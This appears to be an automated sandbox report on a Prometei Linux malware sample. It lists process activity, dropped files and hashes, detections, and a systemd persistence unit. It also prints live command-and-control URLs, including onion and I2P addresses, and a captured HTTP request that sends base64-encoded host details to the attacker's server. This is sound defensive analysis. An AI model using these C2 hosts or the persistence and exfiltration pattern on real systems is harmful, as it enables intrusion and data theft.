    Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (2); Proxy (1)
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
    No configs have been found
    Behavior Graph (ID: 1652748; Sample: na.elf; Start date: 31/03/2025; Architecture: LINUX; Score: 92)

    Network nodes: 152.36.128.18 (ports 58304, 58306, 80; NCRENUS, United States); 109.202.202.202 (port 80; INIT7CH, Switzerland); 3 other IPs or domains
    Signatures on the sample node: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 2 other signatures
    Process tree:
    na.elf (dropped /usr/sbin/uplugplay, ELF; Found Tor onion address; Drops files in suspicious directories; Sample deletes itself)
      -> sh -> pgrep; sh -> pidof; sh -> pgrep; 6 other processes (sh -> pidof, sh -> pgrep, sh -> pidof, 3 other processes)
    systemd -> uplugplay -> sh -> uplugplay (dropped /etc/CommId, ASCII)
      -> sh -> dmidecode (Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)); sh -> dmidecode; sh -> hostnamectl; 5 other processes (sh -> hostnamectl, sh -> uptime, sh -> uname, 2 other processes)
    fwupd -> gpg
    7 other processes
    Submitted sample (Source; Detection; Scanner; Label)
    na.elf; 100%; Avira; LINUX/GM.Agent.JQ
    Dropped files (Source; Detection; Scanner; Label)
    /usr/sbin/uplugplay; 100%; Avira; LINUX/GM.Agent.JQ
    /usr/sbin/uplugplay; 47%; ReversingLabs; Linux.Trojan.Generic
    No Antivirus matches
    URLs (Source; Detection; Scanner; Label)
    http://152.36.128.18/cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673; 100%; Avira URL Cloud; malware


    No contacted domains info
    Contacted URLs (Name; Malicious; Antivirus Detection; Reputation)
    http://152.36.128.18/cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673; true; Avira URL Cloud: malware; unknown

    URLs from memory and binary strings (Name; Source; Malicious; Antivirus Detection; Reputation)
    http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni; na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp; false; none; high
    http://upx.sf.net; na.elf, uplugplay.12.dr; false; none; high
    http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi; na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp; false; none; high
    https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi; na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp; false; none; high
    http://152.36.128.18/cgi-bin/p.cgi; na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp; false; none; high
    http://dummy.zero/cgi-bin/prometei.cgi; na.elf, 6203.1.000000000052d000.0000000001575000.rw-.sdmp; false; none; high
    http://152.36.128; na.elf, uplugplay.12.dr; false; none; high
    Contacted IPs (IP; Domain; Country; ASN; ASN Name; Malicious)
    152.36.128.18; unknown; United States; 81; NCRENUS; true
    109.202.202.202; unknown; Switzerland; 13030; INIT7CH; false
    199.232.38.49; unknown; United States; 54113; FASTLYUS; false
    91.189.91.43; unknown; United Kingdom; 41231; CANONICAL-ASGB; false
    91.189.91.42; unknown; United Kingdom; 41231; CANONICAL-ASGB; false
    IP context (Match; Associated Sample Name / URL; Detection; Threat Name; Context)
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=8&i=0HWN0G2585X97X1U
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=9&i=9TCT0M2CLA7NS29C
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=40&i=9N99649NGF6OSORZ
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZ
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=13&i=UPM6985GQ620630A
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=13&i=8711V51Q45KM5B9L
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1
    152.36.128.18; na.elf; malicious; Prometei; 152.36.128.18/cgi-bin/p.cgi?r=31&i=8LCN4KQ5FG8UGTSN
    109.202.202.202; kpLwzBouH4.elf; malicious; Unknown; ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  No context
    ASN context (Match; Associated Sample Name / URL; Detection; Threat Name; Context)
    FASTLYUS; https://www.facebook.com/61574623328720/posts/122103808232820777; malicious; Unknown; 151.101.46.59
    FASTLYUS; https://orgfarm-4ccb539e27-dev-ed.develop.my.salesforce-sites.com/; malicious; Unknown; 199.232.89.229
    FASTLYUS; Bootstrapper.exe; malicious; SheetRat; 185.199.109.133
    FASTLYUS; Bootstrapper.exe; malicious; SheetRat; 185.199.108.133
    FASTLYUS; na.elf; malicious; Prometei; 199.232.90.49
    FASTLYUS; na.elf; malicious; Prometei; 199.232.90.49
    FASTLYUS; l7vmra.elf; malicious; Unknown; 199.232.90.49
    FASTLYUS; na.elf; malicious; Prometei; 199.232.90.49
    FASTLYUS; na.elf; malicious; Prometei; 199.232.90.49
    FASTLYUS; http://APP.IT; malicious; Unknown; 199.232.89.229
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; Mozi.m.elf; malicious; Unknown; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; Mozi.m.elf; malicious; Unknown; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    CANONICAL-ASGB; na.elf; malicious; Prometei; 91.189.91.42
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; Mozi.m.elf; malicious; Unknown; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    INIT7CH; na.elf; malicious; Prometei; 109.202.202.202
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
    NCRENUS; na.elf; malicious; Prometei; 152.36.128.18
                  No context
                  No context
                  Process:/usr/sbin/uplugplay
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):16
                  Entropy (8bit):3.625
                  Encrypted:false
                  SSDEEP:3:CTWbcn:C6Yn
                  MD5:DD4B5DEE3EEDC81F3B2C8F621531A01D
                  SHA1:7C10BD1E9BD129C6FF880360D81CAEB35076A3E1
                  SHA-256:963C3584C05C8EBE126500FD54A001516740B03220FE95AACA9C08CE59D1810A
                  SHA-512:14858A48F3B18B5F878E3DAEBAFBD64B2601B3E2B2C8FBF6400E03AC5FEF026AAF698F8FAA953422D39816EFFE706EAD00DD84EBA263A7FB6127A97E88A120D0
                  Malicious:true
                  Reputation:low
                  Preview:W40DBT2U1D37V673
                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):76
                  Entropy (8bit):3.7627880354948586
                  Encrypted:false
                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                  Process:/tmp/na.elf
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):145
                  Entropy (8bit):4.769509838572339
                  Encrypted:false
                  SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
                  MD5:8CA62D1F47880BCE036C2956C9B7B272
                  SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
                  SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
                  SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
                  Process:/tmp/na.elf
                  File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                  Category:dropped
                  Size (bytes):435932
                  Entropy (8bit):7.942821475319444
                  Encrypted:false
                  SSDEEP:6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgP:25WOSACZSV6eKRH5EPiamb4DsDwwcf
                  MD5:6573A24653020E43E6B1334876E9E365
                  SHA1:C37494F055C96A1C382926296EBC0667E6C765D8
                  SHA-256:8AE62082B05FF343AF8C51805259620512262B298E244F10C36982489DF633FD
                  SHA-512:50347053D710404731C46A6DDDA9BF4415B7192972EAF032212C391CB2A36E2197AD0C4439A1A464B5709170AE30AEB32147A49FE700040FD20FE449FABFBD9E
                  Malicious:true
                  Yara Hits:
                  • Rule: Linux_Trojan_Dofloo_ac3333d1, Description: unknown, Source: /usr/sbin/uplugplay, Author: unknown
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 47%
                  Reputation:low
                  Process:/usr/bin/gpg
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):20
                  Entropy (8bit):3.108694969562842
                  Encrypted:false
                  SSDEEP:3:N/IeCBWwvn:qeqWwvn
                  MD5:1ACEA88765D1526205ABA53A377CD105
                  SHA1:C99F4A16C9BC5E2E78F32406653E8493D5AD51F1
                  SHA-256:020BCE8CD3873172AB0A23EE319B96FC3F7743C11D26D67F32D572E5985DAB1F
                  SHA-512:F0D98319F224BA17B59DB48C44FDE5F1CB2378C3A3EC2BF0A869BA62DB6B97956821A3ED79CC0F5C9EAE3132C20C5EC5977F15FA223AA684090C35C170E0ECAE
                  Malicious:false
                  Reputation:low
                  Preview: 6239.galassia.
                  Process:/usr/bin/gpg
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):20
                  Entropy (8bit):3.108694969562842
                  Encrypted:false
                  SSDEEP:3:N/PSvCB/vn:gvCB/vn
                  MD5:E524912F77656D9739A9AD766F462CD3
                  SHA1:256E96C8483BD132BC818531E06AF1DC1E2DC5D2
                  SHA-256:27EFFB77A984E22A10C93FEE8A6F28D0479DEEA6FE2EC332D66AAE7267183DF1
                  SHA-512:AA38E7DAB8D996C2F5998F66D9E48947EE9724EBAD4C676A915F98C25B093C1D7CF687FB3B5A92F66E8C6B29C257EB1E601A3EAB0D9CCAF92FE91C32D8E6254B
                  Malicious:false
                  Reputation:low
                  Preview: 6247.galassia.
                  Process:/usr/bin/gpg
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):20
                  Entropy (8bit):3.108694969562842
                  Encrypted:false
                  SSDEEP:3:N/IcHevn:qcHevn
                  MD5:D3EF95A3AF44168C7B9962421A4D147D
                  SHA1:999C8F06ED5411610FABC718393C35C63A7D8347
                  SHA-256:2050ACBFADDCE3AB58997464A8D530E59A8E4457F0803246C137CA394C94A850
                  SHA-512:0C16BC0100F0820335D64AF7A73FEDFC826E24C6A0CDCDC71FC65B66C65890AC06E9397CBA5592903D2829FB7008317E508C622245923AD49B0701360D0CF327
                  Malicious:false
                  Reputation:low
                  Preview: 6237.galassia.
                  Process:/usr/bin/gpg
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):20
                  Entropy (8bit):3.108694969562842
                  Encrypted:false
                  SSDEEP:3:N/PWvHevn:kvHevn
                  MD5:C0E5B934AF3603C895E7BEA24E5A7104
                  SHA1:EC7F5C957ACF6E80757DB51CE1CDF4268AA3072D
                  SHA-256:C2577683F7BF4F544A9E6230733B9AFB351D08FFD93E53F3C7AAE3419094B66D
                  SHA-512:33B3A84B0DAF880BC4F95663E609F326494048D291F2EF01EAD08E7F8F04896CDF3B864420EE75DC9162AA8D7837C3F0D99A374EFD61C3937A0062E42064D8E9
                  Malicious:false
                  Reputation:low
                  Preview: 6243.galassia.
                  Process:/usr/bin/gpg
                  File Type:GPG keybox database version 1, created-at Tue Aug 17 14:04:41 2021, last-maintained Mon Mar 31 11:34:03 2025
                  Category:dropped
                  Size (bytes):2534
                  Entropy (8bit):7.619575544539112
                  Encrypted:false
                  SSDEEP:48:slZ3Buh7g8ZMUfN1i9N+EvbYJYv20hIhoRU3h0LJv9ARRt:aUc8ZM+Y+AbcoRU3CARRt
                  MD5:191F77C06B835BC796E75261761FFD9F
                  SHA1:E16B49AF58B115BC5666B653E4D9513047255A75
                  SHA-256:0A64F8D1C433FCB192FFAE62D0D4EE79061B8F309743D99E87F021974AE4DC06
                  SHA-512:B1EBD44165B357A7574E86E4073AFE7AAD30E24482613C300F6F4014824B586DD858ABEC25332C27F582E37A07CBAEE4A64712137D1291A7CC065A3C0D494067
                  Malicious:false
                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                  Entropy (8bit):7.942821475319444
                  TrID:
                  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                  File name:na.elf
                  File size:435'932 bytes
                  MD5:6573a24653020e43e6b1334876e9e365
                  SHA1:c37494f055c96a1c382926296ebc0667e6c765d8
                  SHA256:8ae62082b05ff343af8c51805259620512262b298e244f10c36982489df633fd
                  SHA512:50347053d710404731c46a6ddda9bf4415b7192972eaf032212c391cb2a36e2197ad0c4439a1a464b5709170ae30aeb32147a49fe700040fd20fe449fabfbd9e
                  SSDEEP:6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgP:25WOSACZSV6eKRH5EPiamb4DsDwwcf
                  TLSH:679423F8C87D2E3098169B3CBB1A826CF0A15772D9562F6EB51AF5732179F1FAC60101

                  ELF header

                  Class:ELF64
                  Data:2's complement, little endian
                  Version:1 (current)
                  Machine:Advanced Micro Devices X86-64
                  Version Number:0x1
                  Type:EXEC (Executable file)
                  OS/ABI:UNIX - System V
                  ABI Version:0
                  Entry Point Address:0x15de360
                  Flags:0x0
                  ELF Header Size:64
                  Program Header Offset:64
                  Program Header Size:56
                  Number of Program Headers:3
                  Section Header Offset:0
                  Section Header Size:0
                  Number of Section Headers:0
                  Header String Table Index:0
                  Type      | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align  | Prog Interpreter | Section Mappings
                  LOAD      | 0x0    | 0x400000        | 0x400000         | 0x1000    | 0x1174858   | 7.6054  | 0x6   | RW                | 0x1000 |                  |
                  LOAD      | 0x0    | 0x1575000       | 0x1575000        | 0x69e4d   | 0x69e4d     | 7.9430  | 0x5   | R E               | 0x1000 |                  |
                  GNU_STACK | 0x0    | 0x0             | 0x0              | 0x0       | 0x0         | 0.0000  | 0x6   | RW                | 0x10   |                  |


                  Timestamp                       | SID     | Signature                                        | Severity | Source IP    | Source Port | Dest IP       | Dest Port | Protocol
                  2025-03-31T13:34:09.010173+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3        | 192.168.2.23 | 58304       | 152.36.128.18 | 80        | TCP
                  2025-03-31T13:34:16.235087+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3        | 192.168.2.23 | 58306       | 152.36.128.18 | 80        | TCP
                  • Total Packets: 144
                  • 443 (HTTPS)
                  • 80 (HTTP)
                  • 152.36.128.18
                  Session ID | Source IP    | Source Port | Destination IP | Destination Port
                  0          | 192.168.2.23 | 58304       | 152.36.128.18  | 80
                  Timestamp                            | Bytes transferred | Direction | Data
                  Mar 31, 2025 13:34:08.780607939 CEST | 75                | OUT       | GET /cgi-bin/p.cgi?r=8&i=W40DBT2U1D37V673 HTTP/1.0
                                                                                         Host: 152.36.128.18
                  Mar 31, 2025 13:34:09.008744955 CEST | 179               | IN        | HTTP/1.1 200 OK
                  Date: Mon, 31 Mar 2025 11:34:08 GMT
                  Server: Apache/2.4.41 (Win64)
                  Content-Length: 7
                  Connection: close
                  Content-Type: text/html; charset=windows-1251
                  Data Raw: 73 79 73 69 6e 66 6f
                  Data Ascii: sysinfo


                  Session ID | Source IP    | Source Port | Destination IP | Destination Port
                  1          | 192.168.2.23 | 58306       | 152.36.128.18  | 80
                  Timestamp                            | Bytes transferred | Direction | Data
                  Mar 31, 2025 13:34:15.990279913 CEST | 743               | OUT       | GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA2OjM0OjE0IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAzLjQwLCAxLjM1LCAwLjUzfDE3NDM0MjA4NTQNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=W40DBT2U1D37V673&h=galassia&enckey=TmbdLiekzW9/hq5lwm3rcjU2VdABOdSopMttuU0H8ytJDWb2XrwvKxBq9miWReqZ7F5I6lX8mG2W4uJWg0eUNgzz2AON1JQuBzxmHUumNid6UyxTjxYN8mzz60B4UOKC7KQSrTdYYxJQos7bNwZez+xHpIHs53XTOkx1hCG1wJQ= HTTP/1.0
                                                                                         Host: 152.36.128.18
                  Mar 31, 2025 13:34:16.234800100 CEST | 224               | IN        | HTTP/1.1 200 OK
                  Date: Mon, 31 Mar 2025 11:34:16 GMT
                  Server: Apache/2.4.41 (Win64)
                  Content-Length: 3
                  Connection: close
                  Content-Type: text/html; charset=windows-1251
                  Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                  Data Ascii: ok!Content-type: text/html; charset=windows-1251


                  System Behavior

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:/tmp/na.elf
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pgrep na.elf"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:52
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pgrep
                  Arguments:pgrep na.elf
                  File size:30968 bytes
                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pidof na.elf"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:54
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pidof
                  Arguments:pidof na.elf
                  File size:27016 bytes
                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pgrep uplugplay"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:55
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pgrep
                  Arguments:pgrep uplugplay
                  File size:30968 bytes
                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pidof uplugplay"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:56
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pidof
                  Arguments:pidof uplugplay
                  File size:27016 bytes
                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pgrep upnpsetup"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:33:58
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pgrep
                  Arguments:pgrep upnpsetup
                  File size:30968 bytes
                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "pidof upnpsetup"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/pidof
                  Arguments:pidof upnpsetup
                  File size:27016 bytes
                  MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "systemctl daemon-reload"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:03
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/systemctl
                  Arguments:systemctl daemon-reload
                  File size:996584 bytes
                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "systemctl enable uplugplay.service"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:04
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/systemctl
                  Arguments:systemctl enable uplugplay.service
                  File size:996584 bytes
                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/tmp/na.elf
                  Arguments:-
                  File size:435932 bytes
                  MD5 hash:6573a24653020e43e6b1334876e9e365

                  Start time (UTC):11:34:05
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:sh -c "systemctl start uplugplay.service"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/bin/sh
                  Arguments:-
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  Start time (UTC):11:34:06
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/systemctl
                  Arguments:systemctl start uplugplay.service
                  File size:996584 bytes
                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/libexec/fwupd/fwupd
                  Arguments:-
                  File size:260616 bytes
                  MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
                  Path:/usr/bin/gpg
                  Arguments:/usr/bin/gpg --version
                  File size:1066992 bytes
                  MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                  Start time (UTC):11:34:00
                  Start date (UTC):31/03/2025
